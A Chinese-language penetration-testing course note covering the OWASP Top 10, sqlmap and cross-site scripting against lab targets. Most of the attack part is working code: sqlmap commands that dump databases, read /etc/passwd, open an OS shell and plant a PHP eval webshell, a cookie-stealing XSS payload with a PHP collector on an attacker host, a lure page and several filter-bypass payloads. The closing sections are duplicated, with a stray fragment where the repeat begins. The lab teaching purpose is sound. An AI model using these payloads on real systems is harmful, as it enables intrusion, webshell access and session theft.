本周重点

①渗透测试介绍

②sqlmap注入扫描工具

③XSS脚本注入

本周主要内容

①渗透测试介绍

一、渗透测试

通过模拟黑客对系统进行攻击的手段或技术，在被测系统中发现漏洞的行为。除了提供漏洞之外，还需提供安全意见。

与黑站不同，渗透测试一般情况下，需要授权。

二、测试类型

1、黑盒测试：不能看到源码，只能通过系统页面进行的测试。

2、白盒测试：通过对源码的代码审计进行的测试。也叫玻璃盒测试。

3、灰盒测试：使用方法可以是黑盒，也可以是白盒。二者结合方式。（通过协议方式，可以理解为灰盒）

三、漏洞的生命周期

POC：Proof ofConcept

Exploit，中文意思是“漏洞利用”

CVE 的英文全称是“Common Vulnerabilities & Exposures”，就是通用漏洞披露，是全球统一的对信息安全漏洞或者已经暴露出来的弱点的公共名称

态势感知：实时监控流量业务，发现入侵行为。

1.0day - 1day

2.发掘->利用->传播->补丁->消亡

0day漏洞：又称零日漏洞，是指已经被攻击者发现并开始利用，但还没有被包括受影响软件厂商在内的公众所知的漏洞。

这类漏洞对攻击者来说有完全的信息优势，由于没有漏洞的对应的补丁或临时解决方案，防守方不知道如何防御，攻击者可以达成最大可能的威胁。0day漏洞通常被黑客以高价在黑市上出售，而攻击者则可以静悄悄地利用这些漏洞，直到相关合法机构意识到问题并发布相应的修补程序。由于0day漏洞从被发现到被利用的时间非常短，对于防守方来说，缺乏漏洞细节和具体信息，单纯依靠防火墙或杀毒软件等传统的防御手段难以实施有效检测。因此，阻止0day漏洞利用攻击，最重要的是升级网络防护体系，通过内存保护技术实现实时监控和主动防御。

四、渗透测试流程

五、owasp top 10

**OWASP的全称是Open Web Application Security Project。**这是一个全球性的、非营利的开放式Web应用程序安全项目组织，旨在通过提高设计和开发过程中的安全性来防止Web应用受到黑客攻击。OWASP成立于2004年4月21日，总部位于美国，是一个国际组织，其基金会负责支持世界各地的活动。

（1）失效的访问控制：（cookies就可以被黑客利用，获取高级别的权限）

​ 通俗的说，就是越权。在未通过身份认证的情况下，对系统进行访问。获取与之身份不匹配的访问权限。

​ ①访问其他用户，获取敏感信息；

​ ②修改其他用户数据；

​ ③修改访问权限；

（2）加密机制失效：

​ 以前也叫敏感数据泄露。

​ ①数据采用明文传输。

​ ②用老旧的或者弱加密算法

​ ③未强制执行加密

​ ④不验证服务器证书

（3）注入：

​ 分为sql注入和xss注入：利用web页面上输入域语法校验漏洞，向系统中注入命令或者代码。

​ ①sql注入：将用户的输入内容通过字符串拼接的方式将系统中的sql命令变成另一个sql命令，从而获取数据（拖库）或者获取文件（get shell）。

​ ②xss注入：对用户输入的信息未过滤，将用户输入的代码注入到其他用户的浏览器上。窃取用户信息，伪装身份攻击。

​ ③代码注入：敏感函数中可以执行代码

​ ④命令注入：敏感函数中可以执行操作系统命令。

（4）不安全的设计

​ 2021版新增漏洞，就是指系统在设计上存在的问题。

​ ①弱验证：没有关闭万能验证码

​ ②使用了简单加密

​ ③隐藏的令牌信息

​ ④静态资源注入：上传

（5）安全配置错误

​ 服务器在系统设置中没有安全相关的软件配置或者安全设备设置。

​ ①对应用程序堆栈没有任何安全强化。 补充知识：https://zhuanlan.zhihu.com/p/588249684?utm_id=0

​ ②对云服务权限配置不正确。

​ ③启用了不必要的功能。

​ ④默认账户和密码处于启用状态或者未修改。

​ ⑤错误信息向用户显示。 die(“操作失败！”,mysqli_error($con))

​ ⑥对升级系统，最新安装安全功能被禁用。

​ ⑦服务器中安全设置没有达到安全值

​ ⑧软件过时。

（6）自带缺陷和过时组件；

​ 系统中带有过时组件（已经发现漏洞的组件）

​ ①不知道所使用组件的版本

​ ②不定期扫描组件，不关注官方公告

​ ③没有对组件基于风险而升级

​ ④不测试，不保护组件

（7）身份识别和身份验证错误

​ 攻击者利用用户身份登录系统。

​ ①允许重复多次登录尝试。 验证码 、 限制操作次数

​ ②允许用户使用弱密码。 123456

​ ③密码找回弱验证。

​ ④缺少或者无效的身份验证

​ ⑤在url中公开会话ID

​ ⑥身份失效时间问题。

（8）软件和数据的完整性保障

​ 这也是一个新增的类型，指的是在不验证完整性的情况下做出与软件更新、关键数据和CI/CD管道相关的假设。

​ ①固件更新没有签名

​ ②恶意更新

​ ③不安全的序列化

（9）安全日志和监控故障

​ 指的是在没有日志记录和监控，将无法检测到漏洞，此类故障会直接影响可见性、事件报警和取证。

​ ①不记录可审计的事件

​ ②警告和错误不生成报告，或者报告内容不清楚

​ ③不监控应用程序的可疑操作。

​ ④日志仅存储在本地

​ ⑤适当的报警阈值响应升级流程没有到位

​ ⑥渗透测试和扫描不报警

（10）服务器请求伪造 ssrf

​ 这一漏洞是在行业调查中添加的，数据显示发生概率较低。

​ ①通过url访问资源，获取敏感文件

​ ②通过url进行内网扫描（ip,端口）

②sqlmap注入扫描工具

一、工具安装

1、环境：

python2.7.5
建议安装在linux下：
python -V

2、安装：

（1）将sqlmap.zip 上传放在/opt目录下：

（2）解压：

yum install unzip
unzip sqlmap.zip

（3）授权：

chmod u+x sqlmap.py

二、使用：

1、扫描:

（1） get请求：注意url中最好带上参数，比如id=1

./sqlmap.py -u "url" 

（2）拖库：

./sqlmap.py -u "url" --current-db     //获取数据库名
./sqlmap.py -u "url" -D 数据库名 --tables //获取表名
./sqlmap.py -u "url" -D 数据库名 -T 表名 --columns //获取所有字段名
./sqlmap.py -u "url" -D 数据库名 -T 表名 -C 字段1,字段2 --dump //获取字段中的值

（3）post请求：

• 需要准备post请求文件：

通过burp拦截请求，copy to file.把请求文件保存下来，或者直接选中请求部分，复制也可以

• 拖库

需要注意：使用头注入参数X-Forwarded-For，这个参数需要放在请求头中，X-Forwarded-For: * ,否则无法注入成功

./sqlmap.py -r "文件名" -p 参数名     //指定参数的post请求扫描

//实际使用案例，获取数据库名称，
./sqlmap.py -r ./postdata.txt -p "X-Forwarded-For" --current-db
//根据数据库名称获取表
./sqlmap.py -r ./postdata.txt -p "X-Forwarded-For" -D posts --tables

以下是postdata.txt 文件内容,注意最后有两个空行

GET /info.php?username=a HTTP/1.1
Host: 192.168.23.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Forwarded-For: *
Connection: close

2、状态保持： --cookie

如果请求发送需要前置条件（登录）。可以通过手动登录后，获取已登录的sessionid.在sqlmap中，通过设置cookie方式，绕过登录：

get: 
./sqlmap.py -u "url" --cookie=xxxx
post:
./sqlmap.py -r "文件" -p 参数 --cookie=xxx

//实际使用案例
./sqlmap.py -r ./postdata.txt -p "X-Forwarded-For" --cookie=PHPSESSID=k7ht96qm6n6hr34ghlpn4l3666 --current-db

3、getshell:

（1）自动写入木马：–os-shell

建议不使用post请求：

./sqlmap.py -u "http://192.168.32.129/sqlmaster/Less-1/?id=1" --os-shell

（2）读文件: --read-file

./sqlmap.py -u "http://192.168.32.129/sqlmaster/Less-1/?id=1" --file-read "/etc/passwd"

（3）写文件：–file-write 源文件 --file-dest 目标文件

//制作一个一句话木马
echo <?php eval($_POST['a']);?> > /tmp/secure21
//写入木马
./sqlmap.py -u "http://192.168.23.128/info.php?username=1" --file-write "/tmp/secure21" --file-dest "/opt/lampp/htdocs/muma21.php"

③XSS脚本注入

一、XSS概念

cross site scripting: 跨站攻击脚本，主要攻击发生在浏览器这一段，不会对服务器产生影响。

二、危害

1、挖矿

2、植入广告

3、盗取用户cookie：进一步可以窃取用户的资料

4、利用用户的机器，植入木马，进行DDOS攻击

三、Xss攻击的前提

1、页面需要有用户可输入的点

2、用户输入的内容需要回显在页面的某个部分

3、如果构造了一个连接，需要诱导目标用户去点击

四、Xss类型

1、反射型

（1）不修改DOM标签的

弹出一个alert

步骤：

先在靶机上修改list.php的代码，增加输入框和查询按钮

<?php

$sk = @$_GET['sk'];

session_start();

include 'dbinfo.php';

mysqli_set_charset($conn,"utf8");

//查询数据库
$sql = "select * from tb_articles where title like '%$sk%'";
$result = mysqli_query($conn,$sql);

echo "上一次查询关键字：".$sk;
?>
<div align="center">当前登录用户：
    <?php 
      $s = @$_SESSION["loginuser"]; 
      if($s=="ok"){
        echo $_SESSION["username"]; 
      }else{
        echo "游客";
      }
    
    ?>
<div>

  <form>
      <input type="text" name="sk">
      <input type="submit" name="submit" value="search">
  </form>
        
<table border="1" align=center>
    <tr><td>Id</td><td>标题</td><td>创建时间</td><td>作者</td><td>操作</td></tr>
    <?php  
      while($rows = mysqli_fetch_assoc($result)){
     ?>
         <tr>
            <td><?=$rows['id']?></td>
            <td> <a href="details.php?id=<?=$rows['id']?>"><?=$rows['title']?>  </a></td>
            <td><?=$rows['createtime']?></td>
            <td><?=$rows['author']?></td>
            <td> <a href="delete.php?id=<?=$rows['id']?>">删除</a>
                 <a href="editarticle.php?id=<?=$rows['id']?>">修改</a>
            </td>
        </tr>
    <?php 
      }
    ?>
</table>

<?php
//关闭数据库连接
mysqli_close($conn);

?>

访问靶机的list.php，在查询框里输入：

<script>alert(1)</script>

点击search按钮，看到会弹出一个警告框，把上面的url复制下来

在黑客机器上，创建一个html页面，girl01.html，自己准备一张美女图片，放在girl01.html相同目录中。

注意，这个html中href的跳转连接地址，就从上面图片的中浏览器的url地址栏复制过来。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>美女图片</title>
</head>
<body>
    
    <a href="http://192.168.75.128/hz02/posts/list.php?sk=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=search">
        <img src="0.jpg" width="400px" height="300px">约吗！</a>
</body>
</html>

访问黑客机器上的girl01.html,看到如下页面

鼠标点击“约吗”，网页会跳转到刚刚目标靶机的list.php页面，并且会弹出一个警告框

盗取用户Cookie：

用户已经登录了目标系统，并且在没有关闭浏览器的情况下，用相同的浏览器打开了包含攻击脚本链接

先在黑客的服务器准备一个数据库表，保存受害者的cookie信息

CREATE TABLE `tb_cookie` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `cookie` varchar(1000) DEFAULT NULL,
  `createtime` datetime DEFAULT NULL ON UPDATE CURRENT_TIMESTAMP,
  `remoteip` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

准备一个程序，收集受害者的cookie

<?php
//这段程序写在黑客的机器上，用来接收受害用户浏览器的cookie
$ucookie = @$_GET['ucookie'];
$refer = @$_SERVER['HTTP_REFERER'];

$dbhost = "127.0.0.1";
$dbuser = "root";
$dbpass = "";
$dbname = "posts";
$dbport = 3306;

//连接数据库
$conn = mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);
//设置数据库连接的编码格式UTF8
mysqli_set_charset($conn,"utf8");

$sql = "insert into tb_cookie(cookie,createtime,remoteip) values('$ucookie',now(),'$refer')";

mysqli_query($conn,$sql);

mysqli_close($conn);

?>

构造一个url链接，可以是一个美女图片，也可以是文字。关键是用户对这个有兴趣，会点击这个连接；

<a href="http://192.168.6.128/hz02/posts/list.php?sk=<script>new Image().src='http://192.168.6.129/xss02/getcookies.php?ucookie='%2bdocument.cookie</script>&search=search">你的申请被拒绝</a>

另外还可以把getcookies.js放在黑客服务器上

//这个js文件放在黑客服务器上
new Image().src='http://192.168.6.129/xss02/getcookies.php?ucookie='+document.cookie;

那么html的url连接就是

<a href="http://192.168.6.128/hz02/posts/list.php?sk=<script src='http://192.168.6.129/xss02/getcookies.js'></script>&search=search">点一下？</a>   

（2）修改DOM标签的

php的代码：

<?php
$sk = @$_GET['sk'];
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    
aaaa

<!-- <input type="text" id="username" name="username" value=""><script>alert(1)</script><span alt=""> -->
<form>
  显示：<input type="text" id="username" name="username" value="<?=$sk?>">

  <br>

  输入：<input type="text" name="sk" id="sk"  >

  <br>

  <input type="submit" value="search">

</form>

</body>
</html>

在页面的输入框中直接输入

"><script>alert(1)</script><span alt="

点击search按钮，页面弹出警告框

2、存储型

登录靶场，到发帖子页面，内容输入,点击添加按钮保存

<script>alert(1)</script>

保存成功，返回list.php页面，

点击“admin测试xxx”，跳转到详情页面，弹出了警告框

再发一个帖子，包含盗取cookie的xss攻击脚本

帖子的内容是：

<script  src="http://192.168.12.129/xss02/getcookies.js"></script>
你能把我怎么样啊？我现在偷了你的cookie，哈哈哈哈

发帖成功后，保存到靶机数据库的帖子内容

任何用户来访问帖子

只要点击了这个有xss攻击脚本的帖子，就会被盗取cookie

可以看到，cookie被发送给黑客，并保存到黑客数据库

五、XSS闯关靶场

在靶机上，安装xss闯关靶场

1、创建一个目录

mkdir -p /opt/lampp/htdocs/xsscg

2、把靶场中的文件直接上传到目录/opt/lampp/htdocs/xsscg

3、如果没有zip 和 unzip就安装一下

yum -y install zip unzip

4、解压缩靶场文件

cd /opt/lampp/htdocs/xsscg
unzip xsscg.zip

5、访问一下靶场（IP地址改成自己的）

http://192.168.75.129/xsscg/xss/

六、安装DVWA靶场

1、把DVWA-master.zip 上传到/opt/lampp/htdocs

2、解压缩：

unzip DVWA-master.zip

3、修改目录名称

mv DVWA-master dvwa

4、修改配置文件

cd dvwa/config
cp config.inc.php.dist config.inc.php

5、访问dvwa，页面上显示为红色No的项目要修改一下，变成绿色即可。

http://192.168.12.128/dvwa/

根据要求，修改配置

chmod 777 /opt/lampp/htdocs/dvwa/hackable/uploads/

改好之后，刷新网页，可以看到已经是Yes

继续修改：

chmod 777  /opt/lampp/htdocs/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt

修改完再次刷新页面

继续修改

chmod 777 /opt/lampp/htdocs/dvwa/config

如果这两个参数的值都是On就不需要下面的操作，否则

allow_url_fopen = On
allow_url_include = On

如果allow_url_fopen和allow_url_include任何一个不是On，就修改php.ini

 vi /opt/lampp/etc/php.ini

把最前面的分号去掉，并把值修改为On

保存修改后，重启apache

/opt/lampp/xampp restart

看到两个参数的值都是On，就可以了

修改数据库配置

vi /opt/lampp/htdocs/dvwa/config/config.inc.php

根据自己的实际情况修改数据库的用户名和密码，改好保存一下

刷新一下页面，看到数据的用户名和密码已经修改

点击页面底部的create/reset database

创建成功，应该看到

七、BlusLotus工具

1、下载地址，需要注册github账号（前提：需要能上国外的网站）

https://github.com/firesunCN/BlueLotus_XSSReceiver?tab=readme-ov-file

2、把压缩文件上传到攻击机器的/opt/lampp/htdocs目录

3、解压缩

cd /opt/lampp/htdocs
unzip BlueLotus_XSSReceiver-master.zip

4、修改文件夹名称

mv BlueLotus_XSSReceiver-master bluelotus

5、修改目录的权限

chmod -R 777 bluelotus

6、访问主页（ip自己修改）

http://192.168.12.129/bluelotus

点击“安装”按钮。

点击“提交”按钮

点击“登录”按钮

密码是bluelotus

登录成功，看到如下页面

添加一个模板

选择default.js,点击插入模板

添加一个js文件

添加的js会出现在左侧

点击生成Payload按钮，左侧会生成一段javascript的xss攻击脚本

把左边的脚本内容复制，发到帖子内容里

发帖成功，查看一下

当受害者点击这个帖子的标题，查看内容的时候

用鼠标点击右下角的提示，看到有一条记录产生了

查看这条记录，能看到cookie已经被发过来了

八、安装pikachu靶场

1、上传靶场压缩文件到/opt/lampp/htdocs

2、解压缩

unzip pikachu-master.zip

3、改目录名称

mv pikachu-master pikachu

4、修改数据库配置文件

cd pikachu
cd inc
vi config.inc.php

把数据库的用户名，密码根据自己的实际情况修改

修改后，保存

5、重新启动xampp环境

/opt/lampp/xampp restart

6、访问http://192.168.196.128/pikachu/

点击红色字体，进行数据库的初始化

点击“安装/初始化”按钮

看到这个页面说明初始化成功

九、Xss防御

1、使用htmlspecialchars转义函数，把html中字符转码

可以把

单引号，双引号，左尖括号，右尖括号，& 转义成实体字符

为什么要转码？

如果不转码，象< > 在实际的内容中，会在浏览器解析的时候，影响正常的解析，会让浏览器认为是html的标签,

以下网页，在内容中有aaaa<ht，会影响后面的内容展示，所以需要把<转义成 <

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
   
aaaa<ht

<!-- <input type="text" id="username" name="username" value=""><script>alert(1)</script><span alt=""> -->
<form>
  输入：<input type="text" name="sk" id="sk"  >
  <br>
  <input type="submit" value="sea<rch">
  <br>
<div> aaas   </html>  </div>

</form>
</body>
</html>

2、可以使用str_ireplace把一些关键性的字符串替换掉

$sk=str_ireplace('script',"",$sk);
$sk=str_ireplace('href',"",$sk);
$sk=str_ireplace('click',"",$sk);
...........

十、Xss绕过

1、双写绕过

原因：在替换关键字的时候，把关键字替换成了"",

$sk=str_ireplace('script',"",$sk);

可以通过双写script绕过替换

<scriscriptpt>alert(1)</sscriptcript>

2、大小写绕过

原因：在替换的时候没有考虑到大小写敏感的问题

$sk=str_replace('script',"",$sk);

可以通过把单词中的任意字符换成大写绕过

<sCript>alert(1)</sCript>

3、空格绕过

有写程序员会把空格替换掉，破坏html标签的解析规则

$sk=str_replace(" ","",$sk);
此时
<a href="xxxx">点击连接</a> 会被替换成<ahref="xxxx">点击连接</a>，语法会出错

那么可以通过下面的方法绕过

<a/**/href='javascript:alert(1);'>xss漏洞</a>

4、base64编码绕过

有些情况下，没有转义特殊字符，只做了一些关键字的替换，例如把script替换成“ ”,或者scri_pt，那可以考虑使用base64编码方式来绕过，有的浏览器，比如Chrome的高版本，会阻止a标签中的base64编码的执行，可以换其他浏览器试试。

//在帖子内容当中放入如下内容，PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==其实就是<script>alert(1)</script>的base64编码形式
payload:
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">aaaaaa</a>

5、url两次编码

程序

员手工进行一次urldecode操作，程序中没有对< > 等字符特殊过滤，可以进行两次url编码绕过

原始的输入：
"><a href="javascript:alert(1)">aaaa</a> <span b="

payload:
经过第一次url编码：
%22%3e%3c%61%20%68%72%65%66%3d%22%6a%61%76%61%73%63%72%69%70%74%3a%61%6c%65%72%74%28%31%29%22%3e%61%61%61%61%3c%2f%61%3e%20%3c%73%70%61%6e%20%62%3d%22
把上面这些经过编码的内容再一次进行url编码
%25%32%32%25%33%65%25%33%63%25%36%31%25%32%30%25%36%38%25%37%32%25%36%35%25%36%36%25%33%64%25%32%32%25%36%61%25%36%31%25%37%36%25%36%31%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%61%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%33%31%25%32%39%25%32%32%25%33%65%25%36%31%25%36%31%25%36%31%25%36%31%25%33%63%25%32%66%25%36%31%25%33%65%25%32%30%25%33%63%25%37%33%25%37%30%25%36%31%25%36%65%25%32%30%25%36%32%25%33%64%25%32%32

注意：经过两次编码的内容不能直接在浏览器上跟在sk的参数后面，也不能在form表单中提交，因为浏览器会自动的把%再次编码，导致错误。

可以使用burp拦截，直接把请求参数改成以上经过两次url编码的内容。

代码：

<?php 


$sk = @$_GET['sk'];
echo $sk;
//此时打印
echo "<br>";

$sk = str_ireplace("script","scr_ipt",$sk);
echo $sk;
echo "<br>";
$sk = urldecode($sk);//程序员很小心，手工进行urldecode
echo $sk;
//此时打印
echo "<br>";

?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    
<form>
    显示：<input type="text" value="<?=$sk?>" maxlength="1000">
    <br>
    输入：<input type="text" name="sk" id="sk">

    <br>
    <input type="submit" value="search">
</form>
</body>
</html>

6、html实体编码绕过

当程序去替换一些关键字例如：onclick，javascript，onblur，可以进行HTML转码绕过

html转码工具：

https://www.toolzl.com/tools/htmlende.html

原始的输入：
javascript:alert(1) 这个会被改为javascr_ipt:alert(1)无法执行
经过html转码后
javascript:alert(1)
输入即可绕过

代码：

<?php 

$sk = @$_GET['sk'];
$sk = str_ireplace("script","scr_ipt",$sk);

?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    
<form>
    <!-- dddd -->
    <a id="a" href="<?=$sk?>">友情链接</a>
    <!-- 显示：<input type="text" value="<?=$sk?>" maxlength="1000"> -->
    <br>
    输入：<input type="text" name="sk" id="sk">

    <br>
    <input type="submit" value="search">
</form>
</body>
</html>

十一、XSStrike工具

下载地址：https://gitee.com/mirrors/XSStrike

需要先安装python3才可以运行

下载后，直接解压缩即可使用。

使用工具扫描XSS

" id=“sk”>

<br>
<input type="submit" value="search">

```

6、html实体编码绕过

当程序去替换一些关键字例如：onclick，javascript，onblur，可以进行HTML转码绕过

html转码工具：

https://www.toolzl.com/tools/htmlende.html

原始的输入：
javascript:alert(1) 这个会被改为javascr_ipt:alert(1)无法执行
经过html转码后
javascript:alert(1)
输入即可绕过

代码：

<?php 

$sk = @$_GET['sk'];
$sk = str_ireplace("script","scr_ipt",$sk);

?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    
<form>
    <!-- dddd -->
    <a id="a" href="<?=$sk?>">友情链接</a>
    <!-- 显示：<input type="text" value="<?=$sk?>" maxlength="1000"> -->
    <br>
    输入：<input type="text" name="sk" id="sk">

    <br>
    <input type="submit" value="search">
</form>
</body>
</html>

十一、XSStrike工具

下载地址：https://gitee.com/mirrors/XSStrike

需要先安装python3才可以运行

下载后，直接解压缩即可使用。

使用工具扫描XSS